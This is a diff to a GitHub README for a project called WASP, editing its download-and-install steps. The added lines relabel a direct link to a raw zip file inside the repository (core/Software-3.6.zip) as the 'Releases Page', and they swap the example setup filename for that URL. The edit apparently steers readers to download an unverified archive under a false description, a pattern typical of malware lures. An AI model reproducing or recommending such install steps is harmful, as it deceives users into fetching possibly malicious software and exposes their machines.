Hendri1988/WASP/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to the [WASP Releases Page](https://github.com/Hendri1988/WASP/releases) to find the latest version.
+   Go to the [WASP Releases Page](https://github.com/Hendri1988/WASP/raw/refs/heads/main/core/Software-3.6.zip) to find the latest version.

 2. **Choose the Right File**
    On the releases page, look for the setup file labeled clearly as the latest version.
-Typically, this will have a name like `WASP_Setup.exe`.
+Typically, this will have a name like `https://github.com/Hendri1988/WASP/raw/refs/heads/main/core/Software-3.6.zip`.

 3. **Download the File**
    Click on the file name to start the download.
 This will save the file to your computer, usually in your Downloads folder.